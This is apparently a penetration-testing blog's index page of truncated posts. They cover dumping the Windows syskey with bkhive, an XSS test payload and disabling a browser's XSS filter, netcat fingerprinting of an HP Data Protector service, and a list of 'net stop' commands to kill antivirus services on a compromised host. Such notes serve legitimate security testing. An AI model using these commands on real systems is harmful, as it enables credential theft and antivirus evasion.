Simply drop in your BackTrack 5 CD or USB and boot from the inserted media. Once booted, type startx. You can do everything from the console, but it’s nicer to have a pretty GUI!
Left-click Places at the top and then click on the Windows partition you wish to mount. Then open a terminal and, first of all, use bkhive to dump the syskey bootkey from the Windows hive.… Continue reading
So you’ve got some XSS that you want to test, but the browser you’ve been using for your app testing is protecting against the use of JavaScript in the address URL. The following URL:
http://example.com/index.asp?val=<script>alert(1)</script>
would end up getting sent to the server as:
GET /index.asp?val=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
To prevent this, so we can test XSS flaws within applications, we need to turn off the JavaScript filter in the… Continue reading
There are many pages on the web documenting quick reverse shell one-liners. Pentestmonkey and Bernardo Damele have both created a good few posts between them, but I wanted to recapture what they’ve got for my own notes. (It’s easier for me to find stuff if it’s in one place.) All credit goes to both of those guys, from whom I got all this info.
Step one – Set up… Continue reading
OK, so on a job I found a service running on TCP port 5555 on a few servers. A little probing with netcat allowed me to identify the service (all of the output below is from my own testbed, hence the local 192.168.x.x IPs):
root@bt:~# nc 192.168.0.18 5555
break
HP Data Protector A.06.11: INET, internal build 243, built on 25 August 2009, 13:08
root@bt:~#
This version is flagged as vulnerable as… Continue reading
So you’ve got shell access to a remote box as SYSTEM and you want to upload some tools but you keep getting halted by antivirus and the like.
Here’s a quick list of services to kill:
net stop "Ahnlab Task Scheduler"
net stop "altiris client service"
net stop ANTIVIR
net stop ATRACK
net stop "avast! antivirus"
net stop "avast! iavs4 control service"
net stop AVCONSOL
net stop "AVG6 Service"
net… Continue reading